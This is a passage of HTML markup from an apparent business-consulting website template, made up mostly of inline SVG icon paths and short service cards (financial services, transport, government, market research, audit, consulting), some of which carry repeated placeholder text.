7.515-3.365 7.515-7.515v-89.56h14.754c2.997 0 5.708-1.781 6.898-4.533 1.189-2.751.63-5.947-1.424-8.13z"></path><path d="m263.229 296.294c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.046 54.269c-2.054 2.184-2.614 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v141.259c0 4.15 3.365 7.515 7.515 7.515h57.555c4.151 0 7.515-3.365 7.515-7.515v-141.259h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13zm23.304 51.903c-4.151 0-7.515 3.365-7.515 7.515v141.259h-42.526v-141.26c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.882z"></path><path d="m396.221 248.46c-1.42-1.51-3.401-2.366-5.474-2.366-2.072 0-4.054.856-5.474 2.366l-51.047 54.268c-2.054 2.183-2.614 5.379-1.425 8.13 1.19 2.752 3.9 4.533 6.898 4.533h14.754v45.859c0 4.15 3.364 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-53.373c0-4.15-3.364-7.515-7.515-7.515h-4.883l33.661-35.786 33.66 35.786h-4.883c-4.151 0-7.515 3.365-7.515 7.515v189.094h-42.526v-105.662c0-4.15-3.364-7.515-7.515-7.515s-7.515 3.364-7.515 7.515v113.177c0 4.15 3.364 7.515 7.515 7.515h57.556c4.151 0 7.515-3.365 7.515-7.515v-189.095h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13z"></path><path d="m92.805 139.396c0-4.15-3.365-7.515-7.515-7.515h-44.075c-4.15 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151-.001 7.515-3.365 7.515-7.515z"></path><path d="m95.012 198.37-15.676 6.141c-3.865 1.514-5.77 5.874-4.256 9.738 1.161 2.964 3.997 4.775 6.999 4.775.912 0 1.839-.167 2.739-.52l15.676-6.141c3.865-1.514 5.77-5.874 4.256-9.738-1.515-3.863-5.875-5.769-9.738-4.255z"></path><path d="m79.336 74.279 15.676 6.141c.901.353 1.827.52 2.739.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.256-9.738l-15.676-6.141c-3.866-1.514-8.224.392-9.738 4.256-1.514 3.863.392 8.223 4.256 9.737z"></path><path d="m470.785 131.881h-44.075c-4.151 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151 0 7.515-3.365 7.515-7.515-.001-4.15-3.365-7.515-7.515-7.515z"></path><path d="m411.506 212.365 15.675 6.141c.901.353 1.828.52 2.74.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.255-9.738l-15.675-6.141c-3.868-1.514-8.224.392-9.739 4.256-1.514 3.862.391 8.222 4.255 9.737z"></path><path d="m414.25 80.94c.912 0 1.84-.167 2.74-.52l15.675-6.141c3.864-1.514 5.769-5.874 4.255-9.738-1.515-3.865-5.876-5.768-9.739-4.256l-15.675 6.141c-3.864 1.514-5.769 5.874-4.255 9.738 1.161 2.965 3.997 4.776 6.999 4.776z"></path></g></svg>	        
				<h5><a href="#">Financial Services</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512 512"><g><path d="m456.907 161.731-36.977-14.932c-5.967-2.408-12.25-3.628-18.678-3.628-.03 0-.06 0-.09 0l-24.136.04-20.518-19.911c5.611-3.677 9.33-10.01 9.33-17.204 0-11.34-9.227-20.567-20.567-20.567h-26.483c-.377 0-.745.037-1.107.091l-83.802-81.325c-2.83-2.748-6.562-4.263-10.51-4.267l-42.989-.028c-.002 0-.004 0-.005 0-3.635 0-7.013 1.96-8.815 5.118-1.804 3.158-1.774 7.065.075 10.194l75.651 128.099-41.77.065c-1.196.001-2.404.092-3.59.27-.059.009-.118.018-.177.029l-70.077 12.26-49.75-37.177c-2.049-1.533-4.583-2.376-7.139-2.376-.008 0-.016 0-.023 0l-24.191.042c-3.835.008-7.347 2.111-9.164 5.488s-1.637 7.465.468 10.667l34.021 51.798-33.842 51.918c-2.094 3.213-2.258 7.302-.427 10.673 1.827 3.363 5.337 5.45 9.161 5.45h.021l24.19-.042c2.566-.005 5.106-.857 7.149-2.397l49.624-37.352 70.119 12.016c.061.011.123.02.185.029 1.18.171 2.397.244 3.577.257l41.861-.065-37.682 63.807c-6.849-3.421-10.843-6.886-12.607-8.651-1.956-1.955-3.795-4.086-5.467-6.335-3.195-4.301-8.101-6.773-13.46-6.787-.015 0-.028 0-.042 0-5.355 0-10.271 2.457-13.49 6.745-1.672 2.226-3.536 4.371-5.544 6.377-6.604 6.605-22.881 17.722-57.691 17.975l-11.326.082c-6.876.05-12.471 5.685-12.471 12.562v40.948c0 4.109 3.33 7.439 7.439 7.439s7.439-3.33 7.439-7.439v-38.647l9.027-.066c40.116-.292 59.888-14.117 68.103-22.331 2.501-2.501 4.829-5.181 6.922-7.967.521-.694 1.22-.8 1.593-.8h.005c.445.002 1.075.139 1.556.786 2.104 2.828 4.421 5.513 6.886 7.979 6.615 6.614 26.491 22.031 68.105 22.333l9.027.066v73.838c0 14.933-3.471 29.913-10.038 43.322s-16.273 25.336-28.07 34.493l-37.26 28.918c-2.961 2.297-6.503 3.511-10.245 3.511s-7.284-1.214-10.243-3.51l-37.261-28.919c-11.796-9.156-21.503-21.083-28.07-34.493-6.566-13.409-10.038-28.389-10.038-43.322 0-4.109-3.33-7.439-7.439-7.439s-7.439 3.33-7.439 7.439c0 17.188 3.995 34.432 11.554 49.866 7.559 15.435 18.731 29.163 32.308 39.702l37.262 28.919c5.513 4.278 12.39 6.635 19.364 6.635s13.852-2.357 19.366-6.636l37.261-28.918c13.578-10.538 24.749-24.267 32.308-39.702s11.554-32.678 11.554-49.866v-76.137c0-6.877-5.595-12.511-12.471-12.562l-11.326-.082c-12.598-.091-22.805-1.715-30.964-3.98l40.855-69.179 91.634-.143-61.47 59.654c-2.947 2.861-3.018 7.57-.157 10.519 1.459 1.502 3.398 2.258 5.339 2.258 1.866 0 3.735-.698 5.18-2.101l10.856-10.535h29.081c11.34 0 20.567-9.226 20.567-20.566 0-7.553-4.105-14.151-10.19-17.727l22.191-21.535 23.463-.037c6.462-.012 12.773-1.254 18.756-3.695l36.925-15.059c9.181-3.745 14.875-12.23 14.857-22.145-.011-9.916-5.734-18.383-14.927-22.095zm-111.636 96.602c3.137 0 5.69 2.552 5.69 5.69 0 3.136-2.552 5.689-5.69 5.689h-13.751l11.724-11.378h2.027zm0-157.927c3.137 0 5.69 2.552 5.69 5.69 0 3.137-2.552 5.69-5.69 5.69h-.629l-11.726-11.379h12.355zm106.094 91.789-36.925 15.059c-4.2 1.712-8.628 2.585-13.163 2.593l-195.645.306c-.003 0-.007 0-.01 0-.442 0-.886-.03-1.325-.09l-73.178-12.541c-2.016-.346-4.092.156-5.73 1.389l-51.403 38.691-14.976.025 32.007-49.102c1.615-2.477 1.609-5.675-.015-8.146l-32.177-48.991 14.975-.025 51.538 38.513c1.643 1.226 3.719 1.72 5.734 1.369l73.138-12.796c.438-.062.882-.093 1.325-.094l113.263-.177c4.109-.007 7.434-3.342 7.427-7.45-.007-4.105-3.336-7.427-7.439-7.427-.004 0-.008 0-.012 0l-54.228.085-75.886-128.503 34.698.022c.06 0 .116.022.159.064l132.182 128.277-1.783.003c-4.108.007-7.433 3.343-7.426 7.451.007 4.104 3.336 7.426 7.439 7.426h.013l47.247-.078h.063c4.512 0 8.923.857 13.109 2.546l36.976 14.931c5.212 2.105 5.625 6.904 5.628 8.325 0 1.421-.396 6.222-5.6 8.345z"></path><path d="m234.902 173.999c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.004-5.325-4.324-9.639-9.649-9.635z"></path><path d="m270.583 173.976c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.004-5.324-4.323-9.638-9.649-9.635z"></path><path d="m305.624 173.954c-5.325.003-9.639 4.323-9.636 9.648s4.323 9.639 9.648 9.635c5.325-.003 9.639-4.323 9.635-9.648-.003-5.325-4.322-9.639-9.647-9.635z"></path><path d="m341.305 173.931c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.005-5.324-4.324-9.638-9.649-9.635z"></path><path d="m150.203 316.284c-10.855 3.962-22.954 6.715-35.961 8.183-5.408.611-9.486 5.179-9.486 10.628v51.148c0 27.281 12.36 52.522 33.911 69.248l32.996 25.608c1.932 1.501 4.247 2.251 6.562 2.251s4.629-.75 6.559-2.249l32.997-25.61c21.551-16.726 33.912-41.965 33.912-69.248v-51.148c0-5.45-4.08-10.02-9.487-10.628-13.006-1.467-25.105-4.221-35.96-8.183-7.22-2.635-13.734-5.768-19.359-9.314-5.262-3.318-12.062-3.317-17.324-.001-5.627 3.546-12.14 6.681-19.36 9.315zm28.749 3.271c6.519 4.109 13.986 7.71 22.193 10.706 10.908 3.98 22.892 6.847 35.67 8.534v47.448c0 22.652-10.262 43.608-28.157 57.495l-30.435 23.621-30.435-23.621c-17.894-13.888-28.156-34.843-28.156-57.495v-47.448c12.779-1.687 24.761-4.553 35.67-8.534 8.209-2.996 15.676-6.598 22.193-10.706.449-.283 1.008-.283 1.457 0z"></path><path d="m145.068 374.175c-3.261 2.498-3.88 7.167-1.382 10.429l23.844 31.134c1.397 1.823 3.557 2.899 5.854 2.915h.051c2.278 0 4.431-1.044 5.843-2.835l43-54.567c2.543-3.226 1.989-7.904-1.239-10.446-3.224-2.543-7.904-1.988-10.446 1.239l-37.073 47.046-18.023-23.533c-2.497-3.26-7.164-3.879-10.429-1.382z"></path></g></svg>	        
				<h5><a href="#">Airlines & Transport</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M505.709,159.575L336.462,50.682c-3.379-2.174-7.879-1.196-10.052,2.181c-2.173,3.378-1.197,7.878,2.181,10.052    l166.773,107.301h-38.878L266.64,48.07c-6.463-4.158-14.816-4.157-21.28,0L55.514,170.216H16.636L255.991,16.204l33.899,21.81    c3.379,2.173,7.878,1.197,10.052-2.181c2.173-3.378,1.197-7.878-2.181-10.052l-33.899-21.81c-4.776-3.073-10.947-3.073-15.723,0    L6.291,159.575c-5.15,3.314-7.45,9.488-5.723,15.364c1.727,5.876,7.002,9.824,13.126,9.824h36.684v25.07v21.956    c0,5.789,4.106,10.637,9.558,11.784v12.801c0,6.64,5.402,12.042,12.042,12.042h1v89.112c0,4.017,3.256,7.273,7.273,7.273    c4.017,0,7.273-3.256,7.273-7.273v-96.385c0-4.017-3.256-7.273-7.273-7.273h-5.768v-10.04h51.513v10.038h-5.768    c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.273,7.273,7.273h5.768v10.915H74.483V429.11h5.768    c4.017,0,7.273-3.256,7.273-7.273v-18.59c0-4.017-3.256-7.273-7.273-7.273c-4.017,0-7.273,3.256-7.273,7.273v11.317h-1    c-6.64,0-12.042,5.401-12.042,12.041v12.801c-5.453,1.147-9.558,5.995-9.558,11.784v14.682H24.614    c-8.04,0-14.581,6.541-14.581,14.581v15.299c0,8.04,6.541,14.581,14.581,14.581h462.772c8.04,0,14.581-6.541,14.581-14.581    v-15.299c0-8.04-6.541-14.581-14.581-14.581h-25.764V451.19c0-5.789-4.106-10.637-9.558-11.784v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-21.956v-25.07h36.684c6.124,0,11.399-3.948,13.126-9.824    C513.159,169.063,510.859,162.888,505.709,159.575z M253.23,60.303c1.683-1.083,3.857-1.082,5.54,0l170.833,109.914H82.398    L253.23,60.303z M64.924,184.762h382.151v17.797h-77.902h-70.585h-85.176h-70.585H64.924V184.762z M296.304,439.408v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-14.683H361.9v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682h-56.038v-14.682C305.862,445.403,301.756,440.555,296.304,439.408z     M140.542,439.408v-12.801c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.452-1.147,9.558-5.995,9.558-11.784v-14.683h56.039v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682H150.1v-14.682C150.1,445.403,145.994,440.555,140.542,439.408z M275.989,429.11    h5.768v10.915h-51.513V429.11h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142c0-4.017-3.256-7.274-7.273-7.274h-5.768V243.83    h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696C268.716,425.854,271.972,429.11,275.989,429.11z M222.97,229.284    h-0.032h-2.253v-12.178h70.63v12.178h-2.285c-0.005,0-0.011,0.001-0.016,0.001s-0.011-0.001-0.016-0.001H222.97z M220.685,454.213    c0.71,0.231,1.466,0.36,2.253,0.36h66.059c0.811,0,1.589-0.139,2.318-0.384v11.684h-70.63V454.213z M67.21,229.284h-2.285v-12.178    h70.63v12.178h-0.001h-2.285H67.21z M64.924,454.201c0.719,0.238,1.486,0.372,2.285,0.372h66.06c0.799,0,1.566-0.134,2.285-0.372    v11.672h-70.63V454.201z M487.421,480.454l-0.02,15.333c0,0-0.004,0.001-0.015,0.001l-462.807-0.034l0.035-15.334L487.421,480.454    z M444.77,454.572c0.807,0,1.58-0.137,2.306-0.379v11.68h-70.63v-11.665c0.713,0.234,1.473,0.364,2.265,0.364H444.77z     M391.772,253.869h-5.768V243.83h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.274,7.273,7.274    h5.768v10.915h-51.513v-10.915h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142C399.045,257.125,395.789,253.869,391.772,253.869z     M447.077,229.284L447.077,229.284h-2.286c-0.003,0-0.007,0.001-0.01,0.001s-0.007-0.001-0.01-0.001h-66.039h-0.02h-2.265v-12.178    h70.63V229.284z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M259.076,113.165V90.459c7.83,0.559,10.738,4.138,13.422,4.138c3.356,0,4.922-4.25,4.922-6.375    c0-5.48-10.738-7.829-18.344-8.053v-3.02c0-1.343-1.677-2.573-3.355-2.573c-1.902,0-3.244,1.231-3.244,2.573v3.244    c-10.626,1.118-21.252,6.711-21.252,20.804c0,14.317,11.186,18.344,21.252,21.923v26.283c-11.409-0.894-14.429-8.724-18.12-8.724    c-2.796,0-5.145,3.691-5.145,6.376c0,5.481,9.395,12.975,23.265,13.199h0v3.468c0,1.343,1.342,2.573,3.244,2.573    c1.677,0,3.355-1.231,3.355-2.573v-3.803c12.08-1.677,20.357-9.283,20.357-23.041    C279.433,121.666,268.807,116.744,259.076,113.165z M253.149,111.04c-5.929-2.237-10.738-4.586-10.738-10.962    c0-5.816,4.474-8.612,10.738-9.395V111.04z M258.406,149.181V125.58c5.48,2.349,9.842,5.481,9.843,12.528    C268.249,144.483,264.446,148.063,258.406,149.181z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Government Services</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M488.399,492h-21.933V173.536c0-14.823-12.06-26.882-26.882-26.882H390.56c-14.823,0-26.882,12.06-26.882,26.882V492    h-55.692V317.825c0-14.823-12.059-26.882-26.882-26.882H232.08c-14.823,0-26.882,12.06-26.882,26.882V492h-55.692v-90.204    c0-14.823-12.06-26.882-26.882-26.882H73.599c-14.823,0-26.882,12.06-26.882,26.882V492H23.601c-5.523,0-10,4.477-10,10    s4.477,10,10,10h464.798c5.523,0,10-4.477,10-10S493.922,492,488.399,492z M129.504,492H66.716v-90.204    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z M287.985,492h-62.788V317.825    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.794,0,6.882,3.087,6.882,6.882V492z M446.466,492h-62.788V173.536    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M466.442,10.516c0.14-2.729-0.82-5.504-2.904-7.588c-2.084-2.084-4.859-3.045-7.588-2.904    C455.789,0.017,455.63,0,455.466,0h-60.5c-5.523,0-10,4.477-10,10s4.477,10,10,10h37.357l-98.857,98.858l-37.28-37.28    c-1.875-1.875-4.419-2.929-7.071-2.929c-2.652,0-5.196,1.054-7.071,2.929l-179.769,179.77c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.951,4.512,2.927,7.071,2.927s5.119-0.976,7.071-2.929L289.115,102.79l37.28,37.28c3.905,3.905,10.237,3.905,14.143,0    L446.466,34.143v33.81c0,5.523,4.477,10,10,10s10-4.477,10-10V11C466.466,10.837,466.449,10.678,466.442,10.516z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="75.64" cy="303.31" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Marketing Research</a></h5>				<p>Analysis of the market as a whole and its particular components (competitors, consumers, product, etc.)</p>			
        			<a href="#"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<circle cx="10.06" cy="500.446" r="10.06"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="267.005" cy="245.308" r="10.04"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M398.479,118.032c-8.071-8.072-18.802-12.516-30.216-12.516c-11.414,0-22.146,4.446-30.216,12.516    c-16.661,16.662-16.661,43.772,0,60.433c8.332,8.331,19.272,12.495,30.216,12.495c10.941,0,21.886-4.166,30.216-12.495    C415.14,161.803,415.14,134.693,398.479,118.032z M384.282,164.266c-8.833,8.832-23.206,8.832-32.037,0    c-8.833-8.832-8.833-23.204,0-32.037c4.279-4.279,9.967-6.635,16.018-6.635c6.051,0,11.739,2.356,16.018,6.635    C393.114,141.062,393.114,155.434,384.282,164.266z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M125.409,411.45c-4.964-2.472-10.99-0.451-13.462,4.512l-11.958,24.015c-5.2,10.441-15.658,17.423-27.296,18.219    l-13.908,0.952c-2.351,0.157-3.897-1.014-4.612-1.729s-1.889-2.264-1.729-4.613l0.952-13.907    c0.797-11.637,7.779-22.096,18.219-27.296l24.014-11.958c4.964-2.472,6.984-8.499,4.512-13.462    c-2.471-4.963-8.498-6.984-13.462-4.512l-24.014,11.958c-16.792,8.362-28.02,25.182-29.302,43.898l-0.952,13.907    c-0.514,7.507,2.242,14.863,7.562,20.183c4.898,4.898,11.523,7.624,18.403,7.624c0.591,0,1.186-0.02,1.78-0.061l13.908-0.952    c18.716-1.281,35.536-12.508,43.898-29.302l11.958-24.014C132.392,419.948,130.372,413.922,125.409,411.45z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M505.07,8.18c-4.711-4.641-11.201-7.068-17.793-6.639l-9.348,0.596c-83.819,5.351-162.262,45.81-215.215,111.004    L240.71,140.23l-57.583-1.691c-0.098-0.003-0.197-0.004-0.294-0.004c-45.668,0-88.603,17.784-120.896,50.076L2.959,247.59    c-2.805,2.805-3.696,7-2.272,10.702c1.424,3.703,4.894,6.221,8.856,6.423l124.844,6.414l-5.09,6.267    c-2.565,3.159-2.971,7.553-1.026,11.127c1.956,3.596,4.006,7.135,6.144,10.617l-29.606,35.147    c-2.531,3.005-3.076,7.211-1.397,10.763c6.467,13.665,15.05,25.943,25.514,36.493c10.718,10.808,23.251,19.646,37.249,26.271    c1.368,0.648,2.835,0.965,4.293,0.965c2.261,0,4.503-0.764,6.327-2.243c6.378-5.174,13.731-11.311,20.843-17.245    c5.069-4.23,10.255-8.557,15.102-12.547c2.893,1.741,5.822,3.429,8.795,5.046c1.504,0.818,3.153,1.221,4.796,1.221    c2.186,0,4.358-0.712,6.156-2.108l6.843-5.31l6.442,125.37c0.204,3.962,2.721,7.432,6.423,8.856c1.172,0.45,2.39,0.67,3.6,0.67    c2.615,0,5.183-1.023,7.101-2.942l58.979-58.979c32.293-32.293,50.076-75.227,50.076-120.896v-54.995l23.267-18.055    c69.729-54.11,112.196-135.704,116.512-223.862l0.239-4.886C512.295,19.27,509.779,12.822,505.07,8.18z M33.123,245.822    l43.012-43.012c28.465-28.465,66.303-44.157,106.553-44.196l42.085,1.236l-74.71,91.98L33.123,245.822z M184.774,373.874    c-5.241,4.372-10.614,8.856-15.6,12.957c-9.644-5.223-18.368-11.74-25.992-19.428c-7.384-7.445-13.669-15.922-18.737-25.26    l21.676-25.733c6.554,8.793,13.728,17.122,21.478,24.925c0.006,0.006,0.012,0.011,0.018,0.017    c0.002,0.002,0.004,0.005,0.006,0.007c0.003,0.003,0.006,0.005,0.009,0.008c8.593,8.648,17.836,16.584,27.641,23.761    C191.811,368.002,188.264,370.962,184.774,373.874z M351.875,327.672c0,40.305-15.695,78.197-44.196,106.698l-43.012,43.012    l-6.002-116.792l93.209-72.33V327.672z M491.678,29.779c-4.029,82.297-43.673,158.467-108.767,208.98l-157.46,122.189    c-13.058-7.63-25.229-16.639-36.368-26.846l53.086-53.086c3.92-3.92,3.92-10.278,0-14.199c-3.921-3.921-10.278-3.921-14.199,0    l-53.036,53.036c-9.751-10.795-18.387-22.541-25.74-35.104L278.3,125.8C327.732,64.941,400.96,27.171,479.207,22.177l9.348-0.596    c1.225-0.076,2.045,0.532,2.423,0.904c0.377,0.371,1,1.178,0.94,2.409L491.678,29.779z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Organizational Audit</a></h5>				<p>Analysis of internal processes & procedures, staff activity evaluation, evaluation of technologies.</p>			
        			<a href="#"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<circle cx="254.4" cy="237.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="172.07" cy="55.21" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="290.4" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="343.47" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M341.92,254.731c34.292-22.056,54.765-59.534,54.765-100.256V64.863c25.227-2.897,44.887-24.371,44.887-50.36V10    c0-5.522-4.478-10-10-10H80.429c-5.522,0-10,4.478-10,10v4.503c0,26.1,19.826,47.651,45.207,50.401v89.572    c0,40.722,20.473,78.2,54.765,100.257c0.466,0.3,0.702,0.726,0.702,1.268c0,0.542-0.236,0.968-0.702,1.269    c-34.292,22.056-54.765,59.534-54.765,100.256v89.272c-24.94,0.077-45.207,20.386-45.207,45.344V502c0,5.522,4.478,10,10,10    h351.143c5.522,0,10-4.478,10-10v-9.859c0-24.85-20.094-45.087-44.887-45.336v-89.28c0-40.722-20.473-78.2-54.765-100.257    c-0.466-0.3-0.702-0.726-0.702-1.268S341.454,255.032,341.92,254.731z M396.224,466.793c13.929,0,25.271,11.295,25.347,25.207    H90.429c0.076-13.912,11.418-25.207,25.348-25.207h9.839c0.01,0,0.019,0.002,0.028,0.002c0.011,0,0.023-0.002,0.034-0.002h261.007    H396.224z M168.265,446.793l87.888-43.633l87.673,43.633H168.265z M331.102,274.089c28.543,18.358,45.583,49.549,45.583,83.436    v83.282l-116.069-57.766c-2.803-1.396-6.099-1.396-8.901-0.005l-116.078,57.628v-83.14c0-33.887,17.04-65.077,45.583-83.435    c6.189-3.98,9.884-10.743,9.884-18.09s-3.694-14.109-9.884-18.089c-28.543-18.358-45.583-49.549-45.583-83.436V56.94    c0.099-0.564,0.16-1.141,0.16-1.733c0-5.522-4.478-10-10-10h-4.663c-15.055,0-27.613-10.89-30.211-25.207h330.156    c-2.598,14.317-15.156,25.207-30.212,25.207h-172.63c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h158.447v89.269    c0,33.887-17.04,65.077-45.583,83.435c-6.189,3.98-9.884,10.743-9.884,18.09C321.217,263.348,324.911,270.109,331.102,274.089z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M338.63,159.11h-60.178c-11.712,0-18.942,4.568-23.031,8.58c-5.659-5.049-13.826-8.58-25.07-8.58h-60.177    c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h60.177c13.767,0,15.557,8.457,15.683,12.13c0,0.049,0.001,0.092,0.002,0.127    c0.133,5.433,4.576,9.756,9.995,9.756c0.041,0,0.083,0,0.124-0.001c5.475-0.066,9.878-4.523,9.878-9.999c0-0.07,0-0.14-0.001-0.21    c0.021-4.447,1.683-11.803,12.421-11.803h60.178c5.521,0,9.999-4.477,9.999-10C348.63,163.588,344.152,159.11,338.63,159.11z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Business Consulting</a></h5>				<p>Successful experience of experts in structuring investment projects, developing and implementing.</p>			
        			<a href="#"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M436.275,39.807H304.797C300.155,17.119,280.039,0,256,0s-44.156,17.119-48.798,39.807H75.725    c-14.771,0-26.789,12.018-26.789,26.789V351.16c0,14.771,12.017,26.789,26.789,26.789H200.63l-40.566,120.866    c-1.757,5.235,1.063,10.904,6.299,12.662c1.055,0.354,2.128,0.522,3.183,0.522c4.179,0,8.076-2.641,9.479-6.821l42.702-127.229    h68.546l42.702,127.229c1.403,4.181,5.3,6.821,9.479,6.821c1.055,0,2.128-0.169,3.183-0.522c5.236-1.758,8.056-7.427,6.299-12.662    l-40.566-120.866h124.905c14.771,0,26.789-12.018,26.789-26.789V66.596C463.063,51.824,451.046,39.807,436.275,39.807z M256,20    c12.93,0,23.963,8.274,28.082,19.807h-56.163C232.038,28.274,243.071,20,256,20z M443.063,351.16c0,3.743-3.045,6.789-6.789,6.789    h-26.121v-142.56c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10V357.95H359.39V245.979c0-5.522-4.477-10-10-10    c-5.523,0-10,4.478-10,10v111.97h-28.084v-79.255c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v79.255h-25.308V253.277    c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v104.672h-29.037v-55.023c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v55.023    h-23.221v-50.985c0-5.522-4.477-10-10-10s-10,4.478-10,10v50.985h-26.777v-39.337c0-5.522-4.477-10-10-10s-10,4.478-10,10v39.337    h-31.24c-3.743,0-6.789-3.046-6.789-6.789V66.596c0-3.743,3.045-6.789,6.789-6.789h140.468h79.614h140.468    c3.743,0,6.789,3.046,6.789,6.789V351.16z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M410.105,106.884c-0.013-0.137-0.039-0.269-0.058-0.404c-0.026-0.188-0.049-0.377-0.086-0.564    c-0.031-0.158-0.075-0.312-0.114-0.467c-0.04-0.161-0.076-0.323-0.124-0.482c-0.046-0.153-0.104-0.301-0.158-0.451    c-0.056-0.158-0.109-0.317-0.173-0.473c-0.058-0.139-0.125-0.272-0.189-0.407c-0.075-0.161-0.147-0.323-0.231-0.48    c-0.068-0.127-0.146-0.249-0.22-0.373c-0.093-0.156-0.181-0.314-0.283-0.466c-0.089-0.134-0.19-0.259-0.285-0.388    c-0.098-0.133-0.191-0.268-0.297-0.397c-0.179-0.218-0.37-0.425-0.567-0.627c-0.033-0.033-0.06-0.07-0.093-0.103    c-0.032-0.032-0.068-0.059-0.1-0.09c-0.203-0.198-0.412-0.39-0.631-0.57c-0.122-0.1-0.25-0.188-0.376-0.281    c-0.136-0.102-0.269-0.207-0.41-0.302c-0.144-0.096-0.293-0.179-0.44-0.267c-0.133-0.08-0.264-0.163-0.401-0.237    c-0.146-0.078-0.296-0.144-0.445-0.214c-0.147-0.07-0.292-0.143-0.444-0.206c-0.141-0.058-0.285-0.105-0.427-0.156    c-0.166-0.06-0.329-0.123-0.499-0.174c-0.139-0.042-0.279-0.072-0.419-0.108c-0.176-0.045-0.35-0.094-0.53-0.129    